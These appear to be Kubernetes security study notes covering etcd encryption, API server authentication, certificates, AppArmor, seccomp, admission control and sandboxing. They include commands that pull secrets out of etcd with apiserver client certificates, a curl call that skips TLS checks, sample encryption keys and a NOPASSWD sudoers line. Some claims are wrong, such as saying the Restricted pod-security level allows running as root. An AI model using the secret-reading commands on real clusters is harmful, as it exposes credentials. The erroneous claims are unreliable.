                  ..... redacted
    
  • The traffic captured in the output above is encrypted.

Encrypting data at rest in etcd

  • By default, the API server stores plain-text representations of resources into etcd, with no at-rest encryption.

  • etcd stores data in the /var/lib/etcd/member directory. When the database is not encrypted, one can easily grep the contents of this directory, looking for secrets:

    root@controlplane00:/var/lib/etcd/member# ls -lisa
    total 16
    639000 4 drwx------ 4 root root 4096 Mar 21 10:53 .
    385187 4 drwx------ 3 root root 4096 Mar 21 10:52 ..
    639002 4 drwx------ 2 root root 4096 Mar 21 14:43 snap
    638820 4 drwx------ 2 root root 4096 Mar 21 11:59 wal
    
    root@controlplane00:/var/lib/etcd/member# grep -R test-secret .
    grep: ./wal/00000000000000ac-0000000000a9340b.wal: binary file matches
    grep: ./wal/00000000000000a8-0000000000a721c1.wal: binary file matches
    grep: ./wal/00000000000000aa-0000000000a83f1e.wal: binary file matches
    grep: ./wal/00000000000000a9-0000000000a7b97e.wal: binary file matches
    grep: ./wal/00000000000000ab-0000000000a8d8a7.wal: binary file matches
    grep: ./snap/db: binary file matches
    
  • The kube-apiserver process accepts an argument –encryption-provider-config that specifies a path to a configuration file. The contents of that file, if you specify one, control how Kubernetes API data is encrypted in etcd.

  • If you are running the kube-apiserver without the –encryption-provider-config command line argument, you do not have encryption at rest enabled. If you are running the kube-apiserver with the –encryption-provider-config command line argument, and the file that it references specifies the identity provider as the first encryption provider in the list, then you do not have at-rest encryption enabled (the default identity provider does not provide any confidentiality protection.)

  • If you are running the kube-apiserver with the –encryption-provider-config command line argument, and the file that it references specifies a provider other than identity as the first encryption provider in the list, then you already have at-rest encryption enabled. However, that check does not tell you whether a previous migration to encrypted storage has succeeded.

  • Example EncryptionConfiguration:

      apiVersion: apiserver.config.k8s.io/v1
      kind: EncryptionConfiguration
      resources:
        - resources:
            - secrets
            - configmaps
            - pandas.awesome.bears.example # a custom resource API
          providers:
            # This configuration does not provide data confidentiality. The first
            # configured provider is specifying the "identity" mechanism, which
            # stores resources as plain text.
            #
            - identity: {} # plain text, in other words NO encryption
            - aesgcm:
                keys:
                  - name: key1
                    secret: c2VjcmV0IGlzIHNlY3VyZQ==
                  - name: key2
                    secret: dGhpcyBpcyBwYXNzd29yZA==
            - aescbc:
                keys:
                  - name: key1
                    secret: c2VjcmV0IGlzIHNlY3VyZQ==
                  - name: key2
                    secret: dGhpcyBpcyBwYXNzd29yZA==
            - secretbox:
                keys:
                  - name: key1
                    secret: YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXoxMjM0NTY=
        - resources:
            - events
          providers:
            - identity: {} # do not encrypt Events even though *.* is specified below
        - resources:
            - '*.apps' # wildcard match requires Kubernetes 1.27 or later
          providers:
            - aescbc:
                keys:
                - name: key2
                  secret: c2VjcmV0IGlzIHNlY3VyZSwgb3IgaXMgaXQ/Cg==
        - resources:
            - '*.*' # wildcard match requires Kubernetes 1.27 or later
          providers:
            - aescbc:
                keys:
                - name: key3
                  secret: c2VjcmV0IGlzIHNlY3VyZSwgSSB0aGluaw==
    
  • Each resources array item is a separate config and contains a complete configuration. The resources.resources field is an array of Kubernetes resource names (resource or resource.group) that should be encrypted like Secrets, ConfigMaps, or other resources.

  • https://kubernetes.io/docs/tasks/administer-cluster/encrypt-data/

  • After enabling encryption in etcd, any resources that you created prior to enabling encryption will not be encrypted. For example, you can encrypt secrets by running:

kubectl get secrets -A -o yaml | kubectl replace -f -
  • Example of getting a secret in etcd:
root@controlplane00:/etc/kubernetes/pki# ETCDCTL_API=3 etcdctl --cacert=./etcd/ca.crt --cert=./apiserver-etcd-client.crt --key=./apiserver-etcd-client.key get /registry/secrets/default/mysecret

/registry/secrets/default/mysecret
k8s:enc:aescbc:v1:key1:ܨt>;8ܑ%TUIodEs*lsHGwjeF8S!Aqaj\Pq;9Ⱥ7dJe{B2=|p4#'BuCxUY,*IuFM
                                                                                   wxx@
2Q0e5UzH^^)rX_H%GUɈ-XqC.˽pC `kBW>K12 n

The path to the resource in the etcd database is ‘/registry///

Securing kube-apiserver

  • Kube-apiserver acts as the gateway for all resources in kubernetes. Kube-apiserver is the only component in kubernetes that communicates with etcd
  • kube-apiserver authenticates to etcd using TLS client certificates.
  • Kube-apiserver should encrypt data before it is stored in etcd
  • kube-apiserver should only listen on an HTTPS endpoint. There was an option to host kube-apiserver on an HTTP endpoint, but this option has been deprecated as of 1.10 and removed in 1.22
  • kube-apiserver should have auditing enabled

Authentication

  • One can authentication to the KubeAPI server using certificates or a kubeconfig file

Access Controls

  • After a request is authenticated, it is authorized. Authorization is the process of determining what actions a user can perform.
  • Multiple authorization modules are supported:
    • AlwaysAllow - Allows all requests
    • AlwaysDeny - Blocks all requests
    • RBAC - Role-based access control for requests. This is the default authorization module in kubernetes
    • Node - Authorizes kubelets to access the kube-api server

2 Cluster Hardening

Securing Access to the KubeAPI Server

  • A request to the KubeAPI server goes through 4 stages before it is processed by KubeAPI:
    • Authentication
      • Validates the identity of the caller by inspecting client certificates or tokens
    • Authorization
      • The authorization stage verifies that the identity found in the first stage can access the verb and resource in the request
    • Admission Controllers
      • Admission Control verifies that the requst is well-formed and/or potentially needs to be modified before proceeding
    • Validation
      • This stage ensures that the request is valid.
  • You can determine the endpoint for the kubeapi server by running: kubectl cluster-info
  • KubeAPI is also exposed via a service named ‘kubernetes’ in the default namespace
    kubeadmin@kube-controlplane:~$ k get svc kubernetes -n default -o yaml
      apiVersion: v1
      kind: Service
      metadata:
        creationTimestamp: "2024-11-11T10:57:42Z"
        labels:
          component: apiserver
          provider: kubernetes
        name: kubernetes
        namespace: default
        resourceVersion: "234"
        uid: 768d1a22-91ff-4ab3-8cd7-b86340fc319a
      spec:
        clusterIP: 10.96.0.1
        clusterIPs:
        - 10.96.0.1
        internalTrafficPolicy: Cluster
        ipFamilies:
        - IPv4
        ipFamilyPolicy: SingleStack
        ports:
        - name: https
          port: 443
          protocol: TCP
          targetPort: 6443
        sessionAffinity: None
        type: ClusterIP
      status:
        loadBalancer: {}
    
    • The endpoint of the kube-api server is also exposed to pods via environment variables:
    kubeadmin@kube-controlplane:~$ k exec -it other -- /bin/sh -c 'env | grep -i kube'
     KUBERNETES_SERVICE_PORT=443
     KUBERNETES_PORT=tcp://10.96.0.1:443
     KUBERNETES_PORT_443_TCP_ADDR=10.96.0.1
     KUBERNETES_PORT_443_TCP_PORT=443
     KUBERNETES_PORT_443_TCP_PROTO=tcp
     KUBERNETES_SERVICE_PORT_HTTPS=443
     KUBERNETES_PORT_443_TCP=tcp://10.96.0.1:443
     KUBERNETES_SERVICE_HOST=10.96.0.1
        ``` 
    
    

Authentication

  • There are two types of accounts that would need access to a cluster: Humans and Machines. There is no such thing as a ‘user account’ primitive in Kubernetes.

User accounts

  • Developers, cluster admins, etc.

Service Accounts

  • Service Accounts are created and managed by the Kubernetes API and can be used for machine authentication
  • To create a service account: kubectl create serviceaccount <account name>
  • Service accounts are namespaced
  • When a service account is created, it has a token created automatically. The token is stored as a secret object.
  • You can also use the base64 encoded token to communicate with the Kube API Server: curl https://172.16.0.1:6443/api -insecure --header "Authorization: Bearer <token value>"
  • You can grant service accounts permission to the cluster itself by binding it to a role with a rolebinding. If a pod needs access to the cluster where it is hosted, you you configure the automountServiceAccountToken boolean parameter on the pod and assign it a service account that has the appropriate permissions to the cluster. The token will be mounted to the pods file system, where the value can then be accessed by the pod. The secret is mounted at /var/run/secrets/kubernetes.io/serviceaccount/token.
  • A service account named ‘default’ is automatically created in every namespace
  • As of kubernetes 1.22, tokens are automatically mounted to pods by an admission controller as a projected volume.
    • https://github.com/kubernetes/enhancements/blob/master/keps/sig-auth/1205-bound-service-account-tokens/README.md
  • As of Kubernetes 1.24, when you create a service account, a secret is no longer created automatically for the token. Now you must run kubectl create token <service account name> to create the token.
    • https://github.com/kubernetes/enhancements/issues/2799
  • One can also manually create a token for a service account:
kubectl create token <service-account-name> --duration=100h

TLS Certificates

  • Server certificates are used to communicate with clients
  • Client certificates are used to communicate with servers
  • Server components used in Kubernetes and their certificates:
    • kube-api server: apiserver.crt, apiserver.key
    • etcd-server: etcdserver.crt, etcdserver.key
    • kubelet: kubelet.crt, kubelet.key
  • Client components used in kubernetes and their certificates:
    • user certificates
    • kube-scheduler: scheduler.crt, scheduler.key
    • kube-controller-manager: controller-manager.crt, controller-manager.key
    • kube-proxy: kubeproxy.crt, kubeproxy.key
  • To generate a self-signed certificate: openssl req -nodes -x509 -keyout my.key -out my.crt --subj="/CN=mysite.com"
  • To generate certificates, you can use openssl:
    • Create a new private key: openssl genrsa -out my.key 2048
    • Create a new certificate signing request: openssl req -new -key my.key -out my.csr -subj "/CN=ryan"
    • Sign the csr and generate the certificate or create a signing request with kube-api:
      • Sign and generate: openssl x509 -req -in my.csr -out my.crt
      • Create a CertificateSigningRequest with kube-api:
        # extract the base64 encoded values of the CSR:
        cat my.csr | base64 | tr -d '\n'
        
        # create a CertificateSigningRequest object with kube-api, provide the base64 encoded value
        .... see the docs
        
  • kubeadm will automatically generate certificates for clusters that it creates
    • kubeadm generates certificates in the /etc/kubernetes/pki/ directory
  • To view the details of a certificate, use openssl: openssl x509 -in <path to crt> -text -noout
  • Once you have a private key, you can sign it using the CertificateSigningRequest object. The controller manager is responsible for signing these requests. You can then use the signed certificate values to authenticate to the Kube API server by placing the signed key, certificate, and ca in a kube config file (~/.kube/config)

kubelet Security

  • By default, requests to the kubelet API are not authenticated. These requests are bound to an ‘unauthenticated users’ group. This behavior can be changed by setting the --anonymous-auth flag to false in the kubelet config
  • kubelet ports
    • port 10250 on the machine running a kubelet process serves an API that allows full access
    • port 10255 on the machine running a kubelet process serves an unauthenticated, read-only API
  • kubelet supports 2 authentication mechanisms: bearer token and certificated-based authentication
  • You can find the location of the kubelet config file by looking at the process: ps aux |grep -i kubelet

Authorization

Roles and ClusterRoles

  • Roles and clusteroles define what a user or service account can do within a cluster
  • The kubernetes primitive role is namespaced, clusterrole is not

Role Bindings and Cluster Role Bindings

  • rolebinding and clusterrolebinding link a user or service account to a role

3 System Hardening

Principle of Least Privilege

  • Ensure that people or bots only have access to what is needed, and nothing else.

Limit access to nodes

Managing Local Users and Groups

  • Commands to be aware of: id who last groups useradd userdel usermod groupdel
  • Files to be aware of: /etc/passwd /etc/shadow /etc/group
  • Disable logins for users and set their login shell to /bin/nologin
  • Remove users from groups they do not need to belong to

Securing SSH

  • Set the following in sshd_config
PermitRootLogin no
PasswordAuthentication no

Using sudo

  • The /etc/sudoers file controls and configures the behavior of the sudo command. Each entry follows a structured syntax. Below is a breakdown of the fields and their meanings:
# Example Lines
# ----------------------------------
# User/Group       Host=Command(s)
admin             ALL=(ALL) NOPASSWD: ALL
%developers       ALL=(ALL) ALL
john              ALL=(ALL:ALL) /usr/bin/apt-get

# Field Breakdown

admin             ALL=(ALL) NOPASSWD: ALL
|                 |   |       |         |
|                 |   |       |         +---> Command(s): Commands the user/group can execute.
|                 |   |       +------------> Options: Modifiers like `NOPASSWD` (no password required).
|                 |   +--------------------> Runas: User/Group the command can be run as.
|                 +------------------------> Host: On which machine this rule applies (`ALL` for any).
+-----------------------------------------> User/Group: The user or group this rule applies to.

# Examples Explained

1. Allow `admin` to execute any command without a password:
   admin ALL=(ALL) NOPASSWD: ALL

Remove Packages Packages

  • This one is self-explanatory. Don’t have unnecessary software installed on your nodes.

Restrict Kernel Modules

  • Kernel modules are ways of extending the kernel to enable it to understand new hardware. They are like device drivers.
  • modprobe allows you to load a kernel module
  • lsmod allows you to view all loaded modules
  • You can blacklist modules by adding a new entry to /etc/modprobe.d/blacklist.conf
    • The entry should be in the format blacklist <module name>
    • Example: echo "blacklist sctp" >> /etc/modprobe.d/blacklist.conf
  • You may need to reboot the system after disabling kernel modules or blacklisting them

Disable Open Ports

  • Use netstat -tunlp or to list listening ports on a system
  • Stop the service associated with the open port or disable access with a firewall
    • Common firewalls you can use are iptables or ufw
      • Run ufw status to list the current status of the UFW firewall
      • Allow all traffic outbound: ufw default allow outgoing
      • Deny all incoming: ufw default deny incoming
      • Allow SSH from 172.16.154.24: ufw allow from 172.16.154.24 to any port 22 proto tcp

Tracing Syscalls

  • There are several ways to trace syscalls in Linux.

strace

  • strace is included with most Linux distributions.
  • To use strace, simply add it before the binary that you are running:
    strace touch /tmp/test
    
  • You can also attach strace to a running process like this:
    strace -p <PID>
    

AquaSec Tracee

  • tracee is an open source tool created by AquaSec
  • Uses eBPF (extended Berkely Packet Filter) to trace syscalls on a system. eBPF runs programs directly within the kernel space without loading any kernel modules. As a result, tools that use eBPF are more efficient and typically use less resources.
  • tracee can be run by using the binaries or as a container

Restricting Access to syscalls with seccomp

  • seccomp can be used to restrict a process’ access to syscalls. It allows access to the most commonly used syscalls, while restricting access to syscalls that can be considered dangerous.

  • To see if seccomp is enabled:

    grep -i seccomp /boot/config-$(uname -r)
    
  • seccomp can operate in 1 of 3 modes:

    • mode 0: disabled
    • mode 1: strict (blocks nearly all syscalls, except for 4)
    • mode 2: selectively filters syscalls
    • To see which mode the process is currently running in: grep -i seccomp /proc/1/status where ‘1’ is the PID of the process
  • seccomp profiles

    • Kubernetes provides a default seccomp profile, that can be either restrictive or permissive, depending on your configuration
    • You can create custom profiles to fine-tune seccomp and which syscalls it blocks or allows within a containers
    • Example seccomp profile for mode 1:
      {
        "defaultAction": "SCMP_ACT_ERRNO",
        "archMap": [
          { "architecture": "SCMP_ARCH_X86_64", "subArchitectures": [] }
        ],
        "syscalls": [
          {
            "names": ["read", "write", "exit", "sigreturn"],
            "action": "SCMP_ACT_ALLOW"
          }
        ]
      }
      
  • To apply a seccomp profile to a pod:

    apiVersion: v1
    kind: Pod
    metadata:
      name: audit-pod
      labels:
        app: audit-pod
    spec:
      securityContext:
        seccompProfile:
          type: Localhost
          localhostProfile: profiles/audit.json #this path is relative to default seccomp profile location (/var/lib/kubelet/seccomp)
      containers:
      - name: test-container
        image: hashicorp/http-echo:1.0
        args:
        - "-text=just made some syscalls!"
        securityContext:
          allowPrivilegeEscalation: false
    

Restrict access to file systems

AppArmor

  • AppArmor can be used to limit a containers’ access to resources on the host. Why do we need apparmor if we have traditional discretionary access controls (file system permissions, etc.)? With discretionary access control, a running process will inherit the permissions of the user who started it. Likely more permissions than the process needs. AppArmor is a mandatory access control implementation that allows one to implement fine-grained controls over what a process can access or do on a system.

  • AppArmor runs as a daemon on Linux systems. You can check it’s status using systemctl: systemctl status apparmor

    • If apparmor-utils is installed, you can also use aa-status
  • To use AppArmor, the kernel module must also be loaded. The check status: cat /sys/module/apparmor/parameters/enabled Y = loaded

  • AppArmor profiles define what a process can and cannot do and are stored in /etc/apparmor.d/. Profiles need to be copied to every worker node and loaded.

  • Every profile needs to be loaded into AppArmor before it can take effect

    • To view loaded profiles, run aa-status
  • To load a profile: apparmor_parser -r -W /path/to/profile

    • If apparmor-utils is installed, you can also use aa-enforce to load a profile
  • Profiles are loaded in ‘enforce’ mode by default. To change the mode to ‘complain’: apparmor_parser -C /path/to/profile

    • If apparmor-utils is installed, you can also use aa-complain to change the mode
  • To view loaded apparmor profiles:

      kubeadmin@kube-controlplane:~$ sudo cat /sys/kernel/security/apparmor/profiles
      cri-containerd.apparmor.d (enforce)
      wpcom (unconfined)
      wike (unconfined)
      vpnns (unconfined)
      vivaldi-bin (unconfined)
      virtiofsd (unconfined)
      rsyslogd (enforce)
      vdens (unconfined)
      uwsgi-core (unconfined)
      /usr/sbin/chronyd (enforce)
      /usr/lib/snapd/snap-confine (enforce)
      /usr/lib/snapd/snap-confine//mount-namespace-capture-helper (enforce)
      tcpdump (enforce)
      man_groff (enforce)
      man_filter (enforce)
      ....
    

    or:

      root@controlplane00:/etc/apparmor.d# aa-status
      apparmor module is loaded.
      33 profiles are loaded.
      12 profiles are in enforce mode.
         /home/rtn/tools/test.sh
         /usr/bin/man
         /usr/lib/NetworkManager/nm-dhcp-client.action
         /usr/lib/NetworkManager/nm-dhcp-helper
         /usr/lib/connman/scripts/dhclient-script
         /usr/sbin/chronyd
         /{,usr/}sbin/dhclient
         lsb_release
         man_filter
         man_groff
         nvidia_modprobe
         nvidia_modprobe//kmod
      21 profiles are in complain mode.
         avahi-daemon
         dnsmasq
         dnsmasq//libvirt_leaseshelper
         identd
         klogd
         mdnsd
         nmbd
         nscd
         php-fpm
         ping
         samba-bgqd
         samba-dcerpcd
         samba-rpcd
         samba-rpcd-classic
         samba-rpcd-spoolss
         smbd
         smbldap-useradd
         smbldap-useradd///etc/init.d/nscd
         syslog-ng
         syslogd
         traceroute
      0 profiles are in kill mode.
      0 profiles are in unconfined mode.
      4 processes have profiles defined.
      2 processes are in enforce mode.
         /usr/sbin/chronyd (704)
         /usr/sbin/chronyd (708)
      2 processes are in complain mode.
         /usr/sbin/avahi-daemon (587) avahi-daemon
         /usr/sbin/avahi-daemon (613) avahi-daemon
      0 processes are unconfined but have a profile defined.
      0 processes are in mixed mode.
      0 processes are in kill mode.
    
  • AppArmor defines profile modes that determine how the profile behaves:

    • Modes:
      • Enforced: Action is taken and the application is allowed/blocked from performing defined actions. Events are logged in syslog.
      • Complain: Events are logged but no action is taken
      • Unconfined: application can perform any task and no event is logged
  • AppArmor Tools

    • Can be used to generate apparmor profiles
    • To install: apt install -y apparmor-utils
    • Run aa-genprof to generate a profile: aa-genprof ./my-application
  • Before applying an AppArmor profile to a pod, you must ensure the container runtime supports AppArmor. You must also ensure AppArmor is installed on the worker node and that all necessary profiles are loaded.

  • To apply an AppArmor profile to a pod, you must add the following security profile (K8s 1.30+):

    securityContext:
      appArmorProfile:
        type: <profile_type>
        localhostProfile: <profile_name>
    
    • <profile_type> can be one of 3 values: Unconfined, RuntimeDefault, or Localhost
      • Unconfined means the container is not restricted by AppArmor
      • RuntimeDefault means the container will use the default AppArmor profile
      • Localhost means the container will use a custom profile

Deep Dive into AppArmor Profiles

AppArmor profiles define security rules for specific applications, specifying what they can and cannot do. These profiles reside in /etc/apparmor.d/ and are loaded into the kernel to enforce security policies.

  • Each profile follows these structure:
profile <profile_name> <executable_path> {
    <rules>
}
  • Example profile, a profile for nano:
profile nano /usr/bin/nano {
    # Allow reading any file
    file,

    # Deny writing to system directories
    deny /etc/* rw,
}
  • Types of AppArmor rules:
    • File Access Rules:
          /home/user/data.txt r       # Read-only access
          /etc/passwd rw              # Read & write access
          /tmp/ rw                    # Full access to /tmp
      
    • Network Access Rules:
          network inet tcp,           # Allow TCP connections
          network inet udp,           # Allow UDP connections
          network inet dgram,         # Allow datagram connections
      
    • Capability Rules:
    deny capability sys_admin,       # Deny sys_admin capability
    deny capability sys_ptrace,      # Deny sys_ptrace capability
    

Linux Capabilities in Pods

  • For the purpose of performing permission checks, traditional UNIX implementations distinguish two categories of processes: privileged processes (whose effective user ID is 0, referred to as superuser or root), and unprivileged processes (whose effective UID is nonzero). Privileged processes bypass all kernel permission checks, while unprivileged processes are subject to full permission checking based on the process’s credentials (usually: effective UID, effective GID, and supplementary group list).
  • Starting with Linux 2.2, Linux divides the privileges traditionally associated with superuser into distinct units, known as capabilities, which can be independently enabled and disabled. Capabilities are a per-thread attribute.
  • Capabilities control what a process can do
  • Some common capabilities
    • CAP_SYS_ADMIN
    • CAP_NET_ADMIN
    • CAP_NET_RAW
  • To view the capabilities of a process:
    • getcap - Check the capabilities of a binary - getcap <path to bin>
    • getpcaps - Check the capabilities of a process - getpcaps <pid>

4 Minimize Microservice Vulnerabilities

Pod Security Admission

  • Replaced Pod Security Policies
  • Pod Security Admission controller enforces pod security standards on pods
  • All you need to do to opt into the PSA feature is to add a label with a specific format to a namespace. All pods in that namespace will have to follow the standards declared.
    • The label consists of three parts: a prefix, a mode, and a level
    • Example: pod-security.kubernetes.io/restricted=privileged
    • Prefix: pod-security.kubernetes.io
    • Mode: enforce, audit, or warn
      • Enforce: blocks pods that do not meet the PSS
      • Audit: logs violations to the audit log but does not block pod creation
      • Warn: logs violations on the console but does not block pod created
    • Level: privileged, baseline, or restricted
      • Privileged: fully unrestricted
        • Allowed: everything
      • Baseline: some restrictions
        • Allowed: most things, except sharing host namespaces, hostPath volumes and hostPorts, and privileged pods
      • Restricted: most restrictions
        • Allowed: very few things, like running as root, using host networking, hostPath volumes, hostPorts, and privileged pods. The pod must be configured with a seccomp profile.

Security Contexts

  • Security contexts are used to control the security settings of a pod or container
  • Security contexts can be defined at the pod level or the container level. Settings defined at the container level will override identical settings defined at the pod level
  • Security contexts can be used to:
    • Run a pod as a specific user
    • Run a pod as a specific group
    • Run a pod with specific Linux capabilities
    • Run a pod with a read-only root filesystem
    • Run a pod with a specific SELinux context
    • Run a pod with a specific AppArmor profile
  • You can view the capabilities of a process by viewing the status file of the process and grepping for capabilities:
    rtn@worker02:~$ cat /proc/self/status |grep -i cap
    CapInh: 0000000000000000
    CapPrm: 0000000000000000
    CapEff: 0000000000000000
    CapBnd: 000001ffffffffff
    CapAmb: 0000000000000000
    

These values are encoded in hexadecimal. To decode them, use the capsh command: rtn@worker02:~$ sudo capsh --decode=000001ffffffffff 0x000001ffffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read,cap_perfmon,cap_bpf,cap_checkpoint_restore

Admission Controllers

  • Admission Controllers are used for automation within a cluster
  • Once a request to the KubeAPI server has been authenticated and then authorized, it is intercepted and handled by any applicable Admission Controllers
  • Example Admission Controllers:
    • ImagePolicyWebook
      • You may see this one on the exam.
      • When enabled, the ImagePolicyWebook admission controller contacts an external service (that you or someone else wrote in whatever language you want, it just needs to accept and respond to HTTP requests).
      • To enable, add ‘ImagePolicyWebook’ to the ‘–enable-admission-plugins’ flag of the kube-api server
      • You must also supply an AdmissionControlFileFile file, which is a kubeconfig formatted file. Then pass the path to this config to the kube-api server with the --admission-control-config-file=<path to config file>. Note that this path is the path inside the kube-api container, so you must mount this path on the host to the pod as a hostPath mount.
    • AlwaysPullImages
    • DefaultStorageClass
    • EventRateLimit
    • NamespaceExists
    • … and many more
  • Admission Controllers help make Kubernetes modular
  • To see which Admission Controllers are enabled:
    • you can either grep the kubeapi process: ps aux |grep -i kube-api | grep -i admission
    • or you can look at the manifest for the KubeAPI server (if the cluster was provisioned with KubeADM) grep admission -A10 /etc/kubernetes/manifests/kube-apiserver.yaml
    • or if the cluster was provisioned manually you can look at the systemd unit file for the kube-api server daemon
  • There are two types of admission controllers:
    • Mutating - can make changes to ‘autocorrect’
    • Validating - only validates configuration
    • Mutating are invoked first. Validating second.
  • The admission controller runs as a webhook server. It can run inside the cluster as a pod or outside the cluster on another server.
  • Some admission-controllers required a configuration file to be passed to the kube-api server. This file is passed using the --admission-control-config-file flag.

Open Policy Agent

  • OPA can be used for authorization. However, it is more likely to be used in the admission control phase.
  • OPA can be deployed as a daemonset on a node or as a pod
  • OPA policies use a language called rego

OPA in Kubernetes

GateKeeper

  • Gatekeeper Constraint Framework

    • Gatekeeper is a validating and mutating webhook that enforces CRD-based policies executed by Open Policy Agent, a policy engine for Cloud Native environments hosted by CNCF as a graduated project.
    • The framework that helps us implement what, where, and how we want to do something in Kubernetes
      • Example:
        • What: Add labels, etc.
        • Where: kube-system namespace
        • How: When a pod is created
  • To run Gatekeeper in Kubernetes, simply apply the manifests provided by OPA

  • The pods and other resources are created in the gatekeeper-system namespace

  • Constraint Templates

    • Before you can define a constraint, you must first define a ConstraintTemplate, which describes both the Rego that enforces the constraint and the schema of the constraint. The schema of the constraint allows an admin to fine-tune the behavior of a constraint, much like arguments to a function.

    • Here is an example constraint template that requires all labels described by the constraint to be present:

      ```
      apiVersion: templates.gatekeeper.sh/v1
      kind: ConstraintTemplate
      metadata:
        name: k8srequiredlabels
      spec:
        crd:
          spec:
            names:
              kind: K8sRequiredLabels
            validation:
              # Schema for the `parameters` field
              openAPIV3Schema:
                type: object
                properties:
                  labels:
                    type: array
                    items:
                      type: string
        targets:
          - target: admission.k8s.gatekeeper.sh
            rego: |
              package k8srequiredlabels
      
              violation[{"msg": msg, "details": {"missing_labels": missing}}] {
                provided := {label | input.review.object.metadata.labels[label]}
                required := {label | label := input.parameters.labels[_]}
                missing := required - provided
                count(missing) > 0
                msg := sprintf("you must provide labels: %v", [missing])
              }
      ```
      
  • Constraints

    • Constraints are then used to inform Gatekeeper that the admin wants a ConstraintTemplate to be enforced, and how. This constraint uses the K8sRequiredLabels constraint template above to make sure the gatekeeper label is defined on all namespaces:
        apiVersion: constraints.gatekeeper.sh/v1beta1
        kind: K8sRequiredLabels
        metadata:
          name: ns-must-have-gk
        spec:
          match:
            kinds:
              - apiGroups: [""]
                kinds: ["Namespace"]
          parameters:
            labels: ["gatekeeper"]
      
    • The match field supports multiple options: https://open-policy-agent.github.io/gatekeeper/website/docs/howto#the-match-field
  • After creating the constraint from the constrainttemplate, you can view all violations by describing the constraint:

    • Example: kubectl describe k8srequiredlabels ns-must-have-gk

Kubernetes Secrets

  • Secrets are used to store sensitive information in Kubernetes
  • base64 encoded when stored in etcd
  • Can be injected into a pod as an env or mounted as a volume

Encrypting etcd

  • By default, the API server stores plain-text representations of resources into etcd, with no at-rest encryption.

  • The kube-apiserver process accepts an argument –encryption-provider-config that specifies a path to a configuration file. The contents of that file, if you specify one, control how Kubernetes API data is encrypted in etcd.

  • If you are running the kube-apiserver without the –encryption-provider-config command line argument, you do not have encryption at rest enabled. If you are running the kube-apiserver with the –encryption-provider-config command line argument, and the file that it references specifies the identity provider as the first encryption provider in the list, then you do not have at-rest encryption enabled (the default identity provider does not provide any confidentiality protection.)

  • If you are running the kube-apiserver with the –encryption-provider-config command line argument, and the file that it references specifies a provider other than identity as the first encryption provider in the list, then you already have at-rest encryption enabled. However, that check does not tell you whether a previous migration to encrypted storage has succeeded.

  • Example EncryptionConfiguration:

      apiVersion: apiserver.config.k8s.io/v1
      kind: EncryptionConfiguration
      resources:
        - resources:
            - secrets
            - configmaps
            - pandas.awesome.bears.example # a custom resource API
          providers:
            # This configuration does not provide data confidentiality. The first
            # configured provider is specifying the "identity" mechanism, which
            # stores resources as plain text.
            #
            - identity: {} # plain text, in other words NO encryption
            - aesgcm:
                keys:
                  - name: key1
                    secret: c2VjcmV0IGlzIHNlY3VyZQ==
                  - name: key2
                    secret: dGhpcyBpcyBwYXNzd29yZA==
            - aescbc:
                keys:
                  - name: key1
                    secret: c2VjcmV0IGlzIHNlY3VyZQ==
                  - name: key2
                    secret: dGhpcyBpcyBwYXNzd29yZA==
            - secretbox:
                keys:
                  - name: key1
                    secret: YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXoxMjM0NTY=
        - resources:
            - events
          providers:
            - identity: {} # do not encrypt Events even though *.* is specified below
        - resources:
            - '*.apps' # wildcard match requires Kubernetes 1.27 or later
          providers:
            - aescbc:
                keys:
                - name: key2
                  secret: c2VjcmV0IGlzIHNlY3VyZSwgb3IgaXMgaXQ/Cg==
        - resources:
            - '*.*' # wildcard match requires Kubernetes 1.27 or later
          providers:
            - aescbc:
                keys:
                - name: key3
                  secret: c2VjcmV0IGlzIHNlY3VyZSwgSSB0aGluaw==
    
  • Each resources array item is a separate config and contains a complete configuration. The resources.resources field is an array of Kubernetes resource names (resource or resource.group) that should be encrypted like Secrets, ConfigMaps, or other resources.

  • https://kubernetes.io/docs/tasks/administer-cluster/encrypt-data/

  • After enabling encryption in etcd, any secrets that you created prior to enabling encryption will not be encrypted. You can encrypt them by running:

kubectl get secrets -A -o yaml | kubectl replace -f -
  • Example of getting a secret in etcd:
ETCDCTL_API=3 etcdctl --cacert=/etc/kubernetes/pki/etcd/ca.crt --cert=/etc/kubernetes/pki/apiserver-etcd-client.crt --key=/etc/kubernetes/pki/apiserver-etcd-client.key get /registry/secrets/three/con1

The path to the resource in the etcd database is ‘/registry///

Container Sandboxing

  • Containers are not contained!
  • A container sandbox is a mechanism that provides an additional layer of isolation between the container and the host
  • Container sandboxing is implemented via Runtime Class objects in Kubernetes.
  • The default container runtime is runc. However, we can change this to use runsc (gvisor) or Kata
  • Sandboxing prevents the dirty cow exploit, which allows a user to gain root access to the host
    • Dirty COW works by exploiting a race condition in the Linux kernel

gVisor

  • gVisor is a kernel written in Golang that intercepts system calls made by a container
  • gVisor is like a ‘syscall proxy’ that sits between the container and the kernel
    • components
      • sentry -
      • gofer -
  • Not all apps will work with gVisor
  • gVisor will cause performance degradation in your app due to the additional time taken
  • gVisor uses runsc as the runtime handler

Kata Containers

  • Kata inserts each container into it’s own virtual machine, giving each it’s own kernel
  • Kata containers require nested virtualisation support, so it may not work with all cloud providers

RuntimeClass

  • RuntimeClass is a new feature in Kubernetes that allows you to specify which runtime to use for a pod

To use a runtime class

  • Create a new runtimeclass object:

    apiVersion: node.k8s.io/v1
    handler: runsc
    kind: RuntimeClass
    metadata:
      name: secure-runtime
    
  • Specify the runtimeClassName in the pod definition:

    apiVersion: v1
    kind: Pod
    metadata:
        name: simple-webapp-1
        labels:
            name: simple-webapp
    spec:
        runtimeClassName: secure-runtime
        containers:
        - name: simple-webapp
          image: kodekloud/webapp-delayed-start
          ports:
          - containerPort: 8080
    
    

Resource Quotas

  • Control requests and limits for CPU and memory within a namespace
apiVersion: v1
kind: ResourceQuota
metadata:
  name: team-a-resource-quota
  namespace: team-a
spec:
  hard:
    pods: "5"
